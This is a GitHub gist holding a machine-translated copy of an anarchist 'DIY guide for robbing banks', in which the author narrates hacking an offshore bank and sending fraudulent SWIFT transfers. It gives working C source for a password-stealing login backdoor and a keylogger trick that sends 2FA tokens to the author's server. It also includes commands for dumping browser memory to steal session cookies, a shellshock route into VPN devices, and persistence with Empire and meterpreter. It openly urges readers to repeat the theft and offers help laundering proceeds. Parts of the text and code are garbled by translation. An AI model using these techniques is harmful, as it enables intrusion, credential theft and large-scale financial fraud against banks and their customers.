Skip to content

Instantly share code, notes, and snippets.

Last active April 16, 2023 01:41
Show Gist options
  • Save toufik-airane/20b03d9ab0993d09281f4919d6fa285d to your computer and use it in GitHub Desktop.
Save toufik-airane/20b03d9ab0993d09281f4919d6fa285d to your computer and use it in GitHub Desktop.
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
Una guía DIY para robar bancos
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
Por el Subcowmandante Marcos
Soy un niño salvaje
Inocente, libre, silvestre
Tengo todas las edades
Mis abuelos viven en mí
Soy hermano de las nubes
Y sólo sé compartir
Sé que todo es de todos
que todo está vivo en mí
Mi corazón es una estrella
Soy hijo de la tierra
Viajo a bordo de mi espíritu
Camino a la eternidad
This is my simple word that seeks to touch the hearts of simple people and
Humble, but also dignified and rebellious. This is my simple word to tell
of my hacks, and to invite other people to hack with cheerful
I hacked a bank. I did it to give a liquidity injection, but this time since
below and to the simple and humble people who resist and rebel against
injustices worldwide. In other words: I robbed a bank and gave away the
money. But it wasn't me alone who did it. The free software movement, the
offensive powershell community, metasploit project and hacker community
in general they are the ones that enabled this hacking. The community
made it possible to convert intrusion into a bank's computers into cash
and bitcoin The Tor, Qubes and Whonix projects, together with the cryptographers and
activists who defend privacy and anonymity, are my nahuales, is
say, my protectors [1]. They accompany me every night and make it possible for me to stay in
I did nothing complicated. I only saw the injustice in this world, I felt love
for all beings, and I expressed that love in the best way I could, through
tools that I know how to use. Hate does not move me to banks, nor to the rich, but
a love for life, and the desire for a world where everyone can perform their
potential and live a full life. I would like to explain a little how I see the world,
so they can get an idea of ​​how I came to feel and act like that.
And I also hope that this guide is a recipe that you can follow, combining the
Same ingredients for baking the same cake. Who knows, there you are
such powerful tools end up also serving you to express the
love they feel
Todos somos niños salvajes
inocentes, libres, silvestres
Todos somos hermanos de los árboles
hijos de la tierra
Sólo tenemos que poner en nuestro corazón
una estrella encendida
(canción de Alberto Kuselman y Chamalú)
The police will invest a chingo of resources to investigate me. They think the
system works, or at least it will work once they catch all the
"bad boys". I am nothing more than the product of a system that does not work.
As long as there is injustice, exploitation, alienation, violence and
ecological destruction, many more will come like me: an endless series of
people who will reject as illegitimate the bad system responsible for this
suffering. That badly done system is not going to compose by arresting me. I am
only one of the millions of seeds that Tupac planted 238 years ago in La
Peace [2], and I hope that my actions and writings water the seed of rebellion
In their hearts
[2] It was before he was killed by the Spaniards, just one day like yesterday, that
He said that "they will only kill me, but tomorrow I will return and I will be millions."
< Para que nos vieran, nos tapamos el rostro >
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
To make us listen, hackers sometimes have to cover our faces, because
We are not interested in seeing our face but understanding our word. The
mask can be from Guy Fawkes, Salvador Dalí, from Fsociety, or in some cases
The puppet of a crested toad. By affinity, this time I went to dig up
a deceased to lend me his balaclava. I think then I should clarify that
Sup Marcos is innocent of everything that is told here because, besides being
Dead, I didn't consult him. I hope your ghost, if you find out from a hammock
Chiapaneca, know how to find the goodness to, as they say there, "dismiss this
deep fake "with the same gesture with which an inopportune insect moves away - that's fine
It could be a beetle.
Still with the balaclava and the name change, many of those who support my
Actions are perhaps going to pay too much attention to my person. With its own
autonomy shattered for a lifetime of domination, they will be looking for a
leader to follow, or a hero who saves them. But behind the balaclava only
I am a Girl. We are all wild children. We just have to place a star
in chamas em nossos corações.
- [1 - Why expropriate] ----------------------------------------- ------------
Capitalism is a system in which a minority has come to appropriate
a vast majority of the world's resources through war, theft and
The explotion. By snatching the commons [1], they forced those below to
being under the control of that minority that owns everything. It is a system
fundamentally incompatible with freedom, equality, democracy and
Sum Qamaña (Good Living). It may sound ridiculous to those of us who have grown up in a
propaganda machinery that taught us that capitalism is freedom, but in
Truly what I say is not a new or controversial idea [2]. The founders
from the United States of America knew they had to choose between creating a
capitalist society, or a free and democratic one. Madison recognized that "the
man who possesses wealth, he who lies on his couch or rolls in his carriage,
cannot judge the wishes or feelings of the day laborer. "But to protect himself
in front of the "spirit of equalization" of the landless day laborers, it seemed
that only landowners should vote, and that the government had to
serve to "protect the opulent minority against the great majority." John
Jay was more to the point and said: "Those who own the country should
rule it. "
/ No existe eso que llaman capitalismo verde. \
| Hagamos al capitalismo historia antes de que nos |
\ convierta en historia. /
\ /\ ___ /\
\ // \/ \/ \\
(( O O ))
\\ / \ //
\/ | | \/
| | | | Evgeny, el gran elefante ignorado, no entiende por qué todos
| | | | fingen no verle en los paneles sobre cambio climático, así
| o | que aquí le doy chance a decir sus líneas.
| | | |
|m| |m|
In the same way that bell hooks [3] argues that the rejection of culture
Patriarchal domination is an act in defense of the male interest (already
that emotionally mutilates them and prevents them from feeling love and connection in a way
full), I believe that the culture of domination of capitalism has an effect
similar about the rich, and that they could have fuller and more satisfying lives
if they rejected the class system from which they believe they benefit. For many,
class privilege equals a childhood of emotional neglect, followed
of a life of superficial social interactions and meaningless work. May
that deep down they know that they can only genuinely connect with people
when they work with them as their peers, and not when they put them at their service.
They may know that sharing their material wealth is the best they can do.
with her. You may also know that meaningful experiences,
connections and relationships that count are not the ones that come from
mercantile interactions, but precisely to reject the logic of the market
and give without expecting anything in return. They may know that everything they need to
escape from his prison and live really is to let go, give up control, and
Take a leap of faith. But most lack courage.
Then it would be naive of us to direct our efforts to try to
produce some kind of spiritual awakening in the rich [4]. As Assata says
Shakur: "No one in the world, no one in history, has ever achieved his
freedom appealing to the moral sense of its oppressors. "Actually, when
rich people distribute their money, they almost always do it in a way that reinforces the
system that to begin with allowed them to amass their enormous and illegitimate wealth
[5]. And change is unlikely to come through a political process;
As Lucy Parsons says: "Let's never be fooled by the rich
they are going to let them vote to take away their wealth. "Colin Jenkins justifies the
expropriation with these words [6]:
Make no mistake, expropriation is not theft. It is not the confiscation of
money earned "with the sweat of the forehead." It is not property theft
private It is, rather, the recovery of huge amounts of land and
wealth that has been forged with stolen natural resources, slavery
human, forced labor force and kneaded in hundreds of years by a
Small minority This wealth ... is illegitimate, both for moral purposes and for
as for the exploitation mechanisms that have been used to create it.
For Colin, the first step is that "we have to free ourselves from our bonds
mental (believing that wealth and private property have been earned by
who monopolize them; and that, therefore, they should be something to respect,
reverence, and even something to pursue), open our minds, study and
learn from history, and recognize this illegitimacy together. "Here I leave you
some books that have helped me with this [7] [8] [9] [10] [11].
According to Barack Obama, economic inequality is "the challenge that defines our
time. "Computer hacking is a powerful tool to combat
economic inequality. The former director of the NSA, Keith Alexander, agrees
and says that hacking is responsible for "the greatest transfer of wealth of the
/ La historia es nuestra \
\ y la hacen lxs hackers! /
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
¡Allende presente, ahora y siempre!
[3] The Will to Change: Men, Masculinity, and Love
[4] his own religion is already very clear about it:
[7] Manifesto for a Democratic Civilization. Volume 1, Civilization: The Era
of the Masked Gods and the Covered Kings
[8] Caliban and the Witch
[9] In debt: An alternative history of the economy
[10] The other story of the United States
[11] The open veins of Latin America
< Nuestra arma es nuestro teclado >
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`' ^^ ^^
- [2 - Introduction] ------------------------------------------- ---------------
This guide explains how I hacked the Cayman Bank and Trust Company
(Isle of Man). Why am I publishing this, almost four years later?
1) To show what is possible
Hackers working for social change have limited themselves to developing
security and privacy tools, DDoS, perform defaults and leaks.
Wherever you go there are radical projects for a complete social change
state of precariousness, and they could do a lot with some money
expropriated At least for the working class, bank robbery is something
socially accepted, and those who do are seen as heroes of the people. In
the digital age, robbing a bank is a non-violent, less risky act, and the
Reward is greater than ever. So why are only hackers from
black hat that they do for their personal benefit, and never
hacktivists to finance radical projects? Maybe they don't think they are
able to do it The big bank hacks come out on the news every
as much as the hacking to the Bank of Bangladesh [1], which was attributed to Korea's
North, or the hacks to banks attributed to the Carbanak group [2], which they describe
as a very large and well organized group of Russian hackers, with different
members who would be specialized in different tasks. And, well it's not so
It is because of our collective belief that the financial system is unquestionable
that we exercise control over ourselves, and maintain the class system
without those above having to do anything [3]. Be able to see how vulnerable and
fragile is actually the financial system helps us break that hallucination
collective That is why banks have a strong incentive not to report the
hacks, and to exaggerate how sophisticated the attackers are. None of the
financial hacks that I did, or of which I have known, has never been reported.
This is going to be the first, and not because the bank would like to, but because I
I decided to publish it.
As you are about to learn in this homemade guide, hack a bank and
transferring money through the SWIFT network does not require the support of any
government, nor of a large and specialized group. It is something totally possible
being a mere amateur hacker and heap, with just tools
public and basic knowledge of how to write a script.
2) Help withdraw cash
Many of those who read this already have, or with a little study are going to be
able to acquire the necessary skills to carry out a hacking
like this. However, many will find that they lack the
criminal connections necessary to get the handles in condition. In Myself
case, this was the first bank that hacked, and at that time I only had a few
few and mediocre accounts prepared to withdraw cash (known
as bank drops), so it was only a few hundred thousand who
I was able to withdraw in total, when it is normal to get millions. Now instead
that I have the knowledge and connections to get cash more seriously, from
so if they are hacking a bank but they need help to convert
that in real money, and they want to use that wool to finance projects
radical social, contact me.
3) Collaborate
It is possible to hack banks as an amateur who works alone, but the
It is clear that, in general, it is not as easy as I paint it here. I was lucky with
This bank for several reasons:
1) It was a small bank, so it took me much less time to get to
Understand how everything worked.
2) They had no procedure to check the sent swift messages.
Many banks have one, and you need to write code to hide your
transfers from your monitoring system.
3) They only used password authentication to access the application with the
that connected to the SWIFT network. Most banks now use RSA
SecurID, or some form of 2FA. You can skip this by writing code to
receive an alert when they enter your token, and thus be able to use it before
expire It's simpler than it seems: I've used Get-Keystrokes [1],
modifying it so that instead of storing the pressed keys, a
GET request to my server every time it is detected that they have entered a
Username. This request adds the username to the url and,
as they type the token, several GETs are made with the token digits
concatenated to the url. On my side I leave this running in the meantime:
ssh yo @ my_secret_server 'tail -f / var / log / apache2 / access_log'
| while read i; I miss $ i; aplay alarm.wav &> / dev / null; done
If it is a web application, you can skip the 2FA by stealing the cookie
after they have authenticated. I am not an APT with a team of coders
That can make me custom tools. I am a simple person who lives
of what terminal [2] gives, so what I use is:
procdump64 / accepteula -r -ma PID_del_browser
strings64 / accepteula * .dmp | findstr PHPSESSID 2> nul
or going through findstr rather than strings, which makes it much more
findstr PHPSESSID * .dmp> tmp
strings64 / accepteula tmp | findstr PHPSESSID 2> nul
Another way to skip it is to access your session with a hidden VNC (hvnc)
after they have authenticated, or with a little creativity too
you could focus on another part of your process instead of sending messages
SWIFT directly.
I think that if I collaborated with other experienced bank hackers we could
make hundreds of banks like Carnabak, instead of doing one of those
in both on my own. So if you have experience with similar hacks and
You want to collaborate, contact me. You will find my email and my PGP key at the end of
the previous guide [3].
Exfiltration / Get-Keystrokes.ps1
/ Si robar un banco cambiara las cosas, \
\ lo harían ilegal /
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
- [3 - Be careful out there] ---------------------------------------- ------
It is important to take some simple precautions. I'm going to refer to this
same section of my last guide [1], since apparently it works just fine
[2]. All I have to add is that, in Trump's words, "Unless
catch hackers in fraganti, it is difficult to determine who is that
I was hacking, "so the police are getting more and more
creative [3] [4] in their attempts to grab criminals on the spot (when
your encrypted hard drives are unlocked). So it would be nice if by
example you carry a certain bluetooth device and configure your
computer to shut down when it moves beyond a certain range, or
when an accelerometer detects movement, or something like that.
You may write long articles detailing your actions and your ideology not
it's the safest thing in the world (ups!), but at times I feel I had to
do what.
Si no creyera en quien me escucha
Si no creyera en lo que duele
Si no creyera en lo que quede
Si no creyera en lo que lucha
Que cosa fuera...
¿Que cosa fuera la maza sin cantera?
|f-"Y\ ____________________
\()7L/ | ¡Sé gay! |
cgD | ¡Haz el crimen! | __ _
|\( --------------------- .' Y '>,
\ \ \ / _ _ \
\\\ \ )(_) (_)(|}
\\\ { 4A } /
\\\ \uLuJJ/\l
\\\ |3 p)/
\\\___ __________ /nnm_n//
c7___-__,__-)\,__)(". \_>-<_/D
//V \_"-._.__G G_c__.-__<"/ ( \
<"-._>__-,G_.___)\ \7\
("-.__.| \"<.__.-" ) \ \
|"-.__"\ |"-.__.-".\ \ \
("-.__"". \"-.__.-".| \_\
\"-.__""|!|"-.__.-".) \ \
"-.__""\_|"-.__.-"./ \ l
".__""">G>-.__.-"> .--,_
"" G
Muchos culpan a las personas queer del declive de esta sociedad;
estamos orgullosxs de ello
Algunos creen que queremos reducir a cenizas
esta civilización y su tejido moral;
No podrían estar más en lo cierto
Con frecuencia nos describen como depravadxs, decadentes y revoltosxs
Pero ¡ay! No han visto nada todavía
- [4 - Get access] ------------------------------------------ ------------
In another place [1] I talked about the main ways to get
Initial access to a company's network during a targeted attack. But nevertheless,
This was not a targeted attack. I didn't set out to hack a specific bank, what
I wanted to hack any bank, which ends up being a lot of homework
more simple This type of nonspecific approach was popularized by Lulzsec and
Anonymous [2]. As part of [1], I prepared an exploit and tools for
post-exploitation for a popular VPN device. Then I started scanning the
entire internet with zmap [3] and zgrab to identify other devices
vulnerable I had the scanner save the vulnerable IPs, along with the
"common name" and "alt names" of the device's SSL certificate, the names
Windows domain of the device, and reverse DNS lookup of the IP. You
I did a grep to the result in search of the word "bank", and there was enough to
choose, but the truth is that the word "Cayman" attracted me, and that is how I came
to stay with this one.
- [4.1 - The Exploit] ---------------------------------------- ----------------
When I published my latest DIY guide [1] I didn't reveal the exploit details of
sonicwall that he had used to hack Hacking Team, since it was very useful for
other hacks, like this one, and I still hadn't finished having fun with him.
Determined then to hack Hacking Team, I spent weeks doing engineering
Reverse to his sonicwall ssl-vpn model, and I even managed to find
several memory corruption vulnerabilities more or less difficult to
explode, before I realized that the device was easily exploitable
with shellshock [2]. When shellshock came out, many sonicwall devices were
vulnerable, only with a request to cgi-bin / welcome, and a payload in the
user-agent Dell released a security update and an advisory for these
versions. The version used by Hacking Team and this bank had the version of
bash vulnerable, but cgi requests didn't fire the shellshock except for
the requests to a shell script, and there was just one accessible:
cgi-bin / This seems to have escaped Dell's in his note,
since they never released a security update or an advisory for that
sonicwall version. And, kindly, Dell had done twounix setuid root,
leaving an easy device to root.
In my last guide many read that I spent weeks researching a device
until they found an exploit, and they assumed that meant that I was some kind
of elite hacker. The reality, that is, the fact that it took me two weeks
realize that it was trivially exploitable with shellshock, maybe less
Flattering to me, but I think it's also more inspiring. Show that
You can really do this for yourself. You don't need to be a genius, I
I certainly am not. Actually my work against Hacking Team started a
year before When I discovered Hacking Team and the Gamma Group in the
CitizenLab research [3] [4], I decided to explore a bit and see if I could
find something. I didn't get anywhere with Hacking Team, but I was lucky with
Gamma Group, and I was able to hack your customer support portal with sql injection
Basic and file upload vulnerabilities [5] [6]. However, despite
that its support server gave me a pivot towards the internal Gamma network
Group, I was unable to penetrate beyond the company. from this one on
experience with the Gamma Group and other hacks, I realized that I was
really limited by my lack of knowledge about privilege escalation and
lateral movement in windows domains, active directory and windows in general.
So I studied and practiced (see section 11), until I felt I was ready
to return to visit Hacking Team almost a year later. The practice
paid off, and this time I was able to make a complete commitment to the
company [7]. Before I realized that I could go in with shellshock, I was
willing to spend happy whole months of life studying development of
exploits and writing a reliable exploit for one of the vulnerabilities of
Memory corruption I had found. I just knew that Hacking Team
I needed to be exposed, and it would take as much time as necessary and
I would learn what I had to learn to get it. To perform these
Hacks you don't need to be bright. You don't even need great knowledge
technical. You just need dedication, and believe in yourself.
bahrain-track-arab-spring-protesters /
- [4.2 - The Backdoor] ---------------------------------------- ---------------
Part of the backdoor that I prepared for Hacking Team (see [1], section 6) was a
Simple wrapper on the login page to capture passwords:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main ()
char buf [2048];
int nread, pfile;
/ * pull the log if we send a special cookie * /
char * cookies = getenv ("HTTP_COOKIE");
if (cookies && strstr (cookies, "our private password")) {
write (1, "Content-type: text / plain \ n \ n", 26);
pfile = open ("/ tmp / .pfile", O_RDONLY);
while ((nread = read (pfile, buf, sizeof (buf)))> 0)
write (1, buf, nread);
exit (0);
/ * the principal stores the POST data and sends it to the child,
what is the real login program * /
int fd [2];
pipe (fd);
pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork ()) {
close (fd [0]);
while ((nread = read (0, buf, sizeof (buf)))> 0) {
write (fd [1], buf, nread);
write (pfile, buf, nread);
write (pfile, "\ n", 1);
close (fd [1]);
close (pfile);
wait (NULL);
} else {
close (fd [1]);
dup2 (fd [0], 0);
close (fd [0]);
execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
"userLogin", NULL);
In the case of Hacking Team, they logged into the VPN with single-use passwords,
so the VPN gave me access only to the network, and from there it took me
An extra effort to get domain admin on your network. In the other guide I wrote
on lateral passes and privilege escalation in windows domains [1]. In this
case, however, it was the same windows domain passwords that were
they used to authenticate against the VPN, so I could get a good
User passwords, including the domain admin. Now I had total
access to your network, but usually this is the easy part. The most complicated part
is to understand how they operate and how to get the gun.
- [4.3 - Fun facts] ---------------------------------------- ------------
Following the investigation they did about the hacking, I found it interesting
see that, by the same time I did it, the bank could have been
committed by someone else through a targeted phishing email [1].
As the old saying goes, "give a person an exploit and they will have access by a
day, teach phishear and he will have access all his life "[2]. The fact that
someone else, by chance and at the same time as me, put on this bank
small in the sights (they registered a domain similar to the real domain of the bank
to be able to send phishing from there) suggests that bank hacks
They occur much more frequently than is known.
A fun suggestion so you can follow your research
hacking is having a backup access, one that you won't touch unless
lose normal access I have a simple script that expects commands a
once a day, or less, just to maintain long-term access in the case of
that block my regular access. Then I had an empire powershell [3]
calling home more frequently to a different IP, and used empire to
launch meterpreter [4] against a third IP, where he performed most of
my job. When PWC started investigating the hacking, they found my use of
empire and meterpreter and cleaned those computers and blocked those IPs, but
They did not detect my backup access. PWC had placed devices
network monitoring, to be able to analyze the traffic and see if there was still
infected computers, so I didn't want to connect much to their network. Alone
I launched mimikatz once to get the new passwords, and from there
I was able to continue your research by reading your emails in the outlook web access.
[1] page 47, Project Pallid Nutmeg.pdf, in torrent
- [5 - Understand Banking Operations] ------------------------------------
To understand how the bank operated, and how I could get money, I followed the
techniques that I summarized in [1], in section "13.3 - Internal Recognition".
I downloaded a list of all file names, I did a grep in search
of words like "SWIFT" and "transfer", and I downloaded and read all the
Files with interesting names. I also looked for emails from employees, but from
by far the most useful technique was to use keyloggers and screenshots to
observe how the bank employees worked. I didn't know it by then, but
For this windows brings a very good monitoring tool [2]. How I know
described in the technique no. 5 of section 13.3 in [1], I captured the
keys pressed throughout the domain (including window titles), I made a
grep in search of SWIFT, and I found some employees opening 'SWIFT Access
Service Bureau - Logon '. For those employees, I ran meterpreter as in [3], and
I used the post / windows / gather / screen_spy module to take screenshots
every 5 seconds, to see how they worked. They were using an app
remote citrix of the bottomline company [4] to access the SWIFT network, where
each payment message SWIFT MT103 had to pass through three employees: one
to "create" the message, one to "verify it", and another to "authorize it". How
I already had all his credentials thanks to the keylogger, I could perform with
Ease the three steps myself. And from what I knew after seeing them
work, they didn't check the sent SWIFT messages, so you should have
enough time to get the money from my bank drops before the bank
He would realize and try to reverse the transfers.
remotely-with-metasploit /
/ Quien roba a un ladrón, tiene cien años \
\ de perdón. /
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
- [6 - Send money] ----------------------------------------- -------------
I didn't have much idea what I was doing, so I was discovering it
by the way. Somehow, the first transfers I sent came out
well. The next day, I screwed up by sending a transfer to Mexico that put
End to my fun. This bank sent its international transfers
through your correspondent account in Natwest. I had seen the bill
correspondent for transfers in pounds sterling (GBP) appeared as
NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The transference
Mexican was in GBP, so I assumed I had to put NWBKGB2LGPL as
correspondent. If I had prepared it better I would have known that the GPL instead of
XXX indicated that the payment would be sent through the Fast Payment Service of the
United Kingdom, rather than as an international transfer, which obviously
Well, it won't work when you're trying to send money to Mexico. So
The bank received an error message. The same day I also tried to send a
Payment of £ 200k to UK using NWBKGB2LGPL, which was not made because 200k exceeded the
shipping limit via fast payments, and you would have had to use NWBKGB2LXXX in
time. They also received an error message for this. They read the messages, what
They investigated, and found the rest of my transfers.
- [7 - The button] ------------------------------------------ --------------------
From what I write they will already have a complete idea of ​​what my ideals are and
What things I give my support. But I don't want to see anyone in legal trouble
for receiving expropriated funds, so not a word more than where
It was the wool. I know journalists are probably going to want to put some
number on how many dollars were distributed in this hack and others
similar, but I prefer not to encourage our perverse habit of measuring
shares just for their economic value. Any action is admirable if
It comes from love and not from the ego. Unfortunately those above, the rich and
powerful, public figures, businessmen, people in positions
"important", those that our society respects and values ​​most, those have
placed where they are based on acting more from the ego than from love. Is in
the simple, humble and "invisible" people on whom we should look and
who should we admire.
- [8 - Cryptocurrencies] ------------------------------------------- --------------
Redistribute expropriated money to Chilean projects that seek social change
positive would be easier and safer if those projects accepted donations
Anonymous via cryptocurrencies like Monero, Zcash, or at least Bitcoin. It is understood
that many of these projects have an aversion to cryptocurrencies, since
they look more like some strange hypercapitalist dystopia than the economy
social with which we dream. I share their skepticism, but I think they turn out
Useful to allow donations and anonymous transactions, by limiting the
Government surveillance and control. Same as cash, whose use many
countries are trying to limit for the same reason.
- [9 - Powershell] ------------------------------------------- -----------------
In this operation, as in [1], I made a lot of use of powershell. By
so, powershell was super cool, you could do almost anything that
you would like, without antivirus detection and with very little forensic footprint. It happens
that with the introduction of AMSI [2] the offensive powershell is retiring.
Today the C # offensive is what is on the rise, with tools like
[3] [4] [5] [6]. AMSI is going to get to .NET for 4.8, so to the tools in
C # probably still have a couple of years left before they become outdated.
And then we'll use C or C ++ again, or maybe Delphi gets back on
fashion. The specific tools and techniques change every few years, but in
the bottom line is not so much what changes, today hacking is essentially still the
Same thing it was in the 90s. In fact all powershell scripts
employees in this guide and in the previous one [1] are still perfectly usable
today, after a small obfuscation of your own harvest.
/ Fo Sostyn, Fo Ordaag \
\ Financial Sector Fuck Off /
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
- [10 - Torrent] ------------------------------------------- -------------------
Privacy for the weak, transparency for the powerful.
Offshore banking provides privacy to its own government to
executives, politicians and millionaires. Exposing them may sound
hypocritical of me, since I am generally in favor of privacy and
against government surveillance. But the law was already written by and
for the rich: it protects its exploitation system, with some limits (such as
taxes) so that society can function and the system does not collapse under the
weight of your own greed. So no, privacy is not the same for
powerful, when it allows them to evade the limits of a system by itself
designed to give them privileges; and privacy for the weak, to whom
protects from a system designed to exploit them.
Even journalists with the best intentions find it impossible
study such a huge amount of material and know what will result
relevant to people in different parts of the world. When I filtered
Hacking Team files, I gave The Intercept a copy of the emails
electronic with one month in advance. They found a couple of the 0days that
Hacking Team was using, previously reported to MS and Adobe and published
a few stories once the leak became public. No point
compared to the huge amount of articles and research that came after
Full filtering to the public. Seeing it like this, and also considering the (no)
editorialized publication [1] of the Panama papers, I think a
Public and complete filtration of this material is the right choice.
protect-western-1-from-panama-leak /
Psychologists found that those who are lower in the hierarchies tend to
understand and empathize with those on top, but that the opposite is less
common. This explains why, in this sexist world, many men joke about
his inability to understand women, as if it were a mystery
irresolvable. Explain why the rich, if they stop to think about who
they live in poverty, give some advice and some "solutions" so alien to the
reality that makes you want to laugh. Explain why we revere executives
as brave who take risks. What do they risk, beyond their
privilege? If all their ventures fail, they will have to live and work
Like the rest of us. It also explains why there will be many who accuse
of irresponsible and dangerous to this leakage without crossing out. Feel the
"danger" about an offshore bank and its customers much more intensely than
what they feel the misery of those dispossessed by this unfair system and
unequal. And the leakage of their finances, is it a danger to them, or
only for its position at the top of a hierarchy that it should not even
_,-._ | Nos vilifican, esos infames; cuando la única |
; ___ : | diferencia es que ellos roban a los pobres |
,--' (. .) '--.__ | amparados por la ley, lo sabe el cielo, y nosotros|
_; ||| \ | saqueamos a los ricos bajo la única protección de |
'._,-----''';=.____," | nuestro propio coraje. ¿No has de preferir ser |
/// < o> |##| | uno de nosotros, antes que pordiosear ante esos |
(o \`--' / villanos en busca de trabajo? |
///\ >>>> _\ <<<< //`---------------------------------------------------'
--._>>>>>>>><<<<<<<< /
___() >>>[||||]<<<<
Capitán Bellamy
- [11 - Learn to hack] ----------------------------------------- -----------
You don't start hacking well. You start hacking shit, thinking
which is good, and then you gradually improve. That's why I always say
that one of the most valuable virtues is persistence.
- Octavia Butler's advice for the APT candidate
The best way to learn to hack is by hacking. Arm a laboratory with
virtual machines and start testing things, taking a break to investigate
Anything you don't understand At a minimum you will want a windows server
as a domain controller, another normal windows vm attached to the domain, and a
development machine with visual studio to compile and modify tools.
Try to make an office document with macros that launch meterpreter or another
RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
psexec and other side pass techniques [1]; as well as the other scripts,
tools and techniques mentioned in this guide and in the previous one [2]. To the
You can disable windows defender first, but then try everything
having it activated [3] [4] (but deactivating the automatic sending of samples).
Once you're comfortable with all that, you'll be ready to hack 99% of the
companies. There are a couple of things that at some point will be very useful in your
learning, how to develop comfortably with bash and cmd.exe, a domain
basic powershell, python and javascript, have knowledge of kerberos [5] [6]
and active directory [7] [8] [9] [10], and a fluent English. A good book
Introductory is The Hacker Playbook.
I also want to write a little about things to not focus on if you don't
you want to entertain just because someone told you that you are not a hacker
true "if you don't know assembler. Obviously, learn whatever interests you,
but I write these lines thinking about those things in which you can
center in order to get practical results if you are looking for hacking
companies to filter and expropriate. A basic knowledge of security in
web applications [11] is useful, but specializing more in web security is not
really the best use of your time, unless you want to make a career in
Pentesting or hunting rewards for bugs. CTFs, and most of the
resources you will find when searching for information about hacking, focus
generally in skills such as web security, reverse engineering, development
of exploits, etc. Things that make sense by understanding them as a way of
prepare people for careers in the industry, but not for our
objectives. Intelligence agencies can afford to have a team
dedicated to the most advanced in fuzzing, a team working on development of
exploits with a güey exclusively investigating the new techniques of
mound manipulation, etc. We have neither the time nor the
resources for that. The two most important skills for hacking
Practical are phishing [12] and social engineering to gain access
initial, and then be able to scale and move through the windows domains.
discovering-the-anti-virus-signature-and-bypassing-it /
- [12 - Recommended Reading] ------------------------------------------ ------
/ Cuando el nivel científico de un mundo \
| supera por mucho su nivel de solidaridad,|
\ ese mundo se autodestruye. /
\ _.---._ . .
* \.' '. *
* _.-~===========~-._
. (___________________) . *
.' \_______/ .'
.' .'
- Ami
Almost all the hacking today is done by black hat hackers, for your
personal gain; or by white hat hackers, for the benefit of
shareholders (and in defense of the banks, companies and states that are us
annihilating us and the planet we live in); and by military and
intelligence agencies, as part of their war and conflict agenda. Seeing
that this our world is already at the limit, I thought that, in addition to these
technical tips to learn how to hack, should include some resources that
they have been very important for my development and have guided me in the use of my
Hacking knowledge
* Ami: The Child of the Stars - Enrique Barrios
* Anarchy Works
* Living My Life - Emma Goldman
* The Rise and Fall of Jeremy Hammond: Enemy of the State
hammond-enemy-of-the-state-183599 /
This guy and the HBGary hack were an inspiration
* Days of War, Nights of Love - Crimethinc
* Momo - Michael Ende
* Letters to a young poet - Rilke
* Dominion (Documentary)
"We can't believe that if we don't look, what we don't want to see will not happen"
- Tolstoy in ÐŸÐµÑ € вР° Ñ Ñ Ñ‚ÑƒÐ¿ÐµÐ½ÑŒ
* Bash Back!
- [13 - Heal] ------------------------------------------- ---------------------
The hacker world has a high incidence of depression, suicides and certain
battles with mental health. I don't think it's because of hacking, but because of the
kind of environment that hackers mostly come from. Like many
hackers, I grew up with little human contact: I was a girl raised by the internet.
I have my struggles with depression and emotional numbness. To Willie Sutton
he is frequently quoted as saying that he robbed banks because "that's where he is
the money ", but the quote is incorrect. What he really said was:
Why did he rob banks? Because I enjoyed it. I loved to do it. I was more
I live when I was inside a bank, in full robbery, that in any
Another moment of my life. I enjoyed it so much that one or two weeks later
I was already looking for the next opportunity. But for me the money was a
Minute, nothing more.
Hacking has made me feel alive. It started as a way to self-medicate the
depression Later I realized that, in reality, it could serve to make
something positive. I do not regret the way I grew up at all, it brought several
Beautiful experiences to my life. But I knew I could not continue to live on
that way. So I started spending more time away from my computer, with
other people, learning to open myself to the world, to feel my emotions, to
connect with others, to accept risks and be vulnerable. Much more
Hard to hack, but at the mere hour the reward is worth it. Still
it’s an effort, but even if it’s slow and wobbly, I feel that
I am going on the right way.
Hacking, done with conscience, can also be what heals us. According to the
Mayan wisdom, we have a gift granted by nature, that we must
understand to put it at the service of the community. In [1], it is explained:
When a person does not accept their work or mission begins to suffer
diseases, apparently incurable; although he does not die shortly
time, but only suffer, in order to wake up or drink
awareness. That is why it is essential that a person who has acquired the
knowledge and performs his work in the communities must pay his Toj and
maintain constant communication with the Creator and his ruwäch qâ € ™ ij, because
He constantly needs the strength and energy of these. On the contrary,
the diseases that made him react or take work could
cause damage again.
If you feel that hacking is fueling your isolation, depression, or others
sufferings, breathe. Give yourself some time to meet and become aware. You
You deserve to live happily, with health and fullness.
< All Cows Are Beautiful >
\ ^__^
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
- [14 - The Bug Hacktivist Program] ------------------------------
It seems to me that hacking to get and filter documents of public interest is
one of the best ways hackers can use their skills in
benefit of society. Unfortunately for us hackers, as in almost
All things, the perverse incentives of our economic system do not match
with what benefits society. So this program is my attempt to
make it possible for good hackers to earn a living honestly
exposing material of public interest, instead of having to walk
selling his work to the cybersecurity, cybercrime or
cyber war Among some examples of companies whose leaks I would love to
pay are the mining, logging and livestock companies that plunder our
beautiful Latin America (and the defenders of land and territory are murdered
that try to stop them), companies involved in attacks on Rojava as
Havelsan, Baykar Makina, or Aselsan, surveillance companies such as the NSO group,
war criminals and birds of prey such as Blackwater and Halliburton, companies
private prisons such as GeoGroup and CoreCivic / CCA, and corporate lobbyists
as ALEC. Pay attention when choosing where to investigate. For example, it is
well known that oil companies are evil: they get rich at the cost of destroying
the planet (and back in the 80s the companies themselves already knew about the
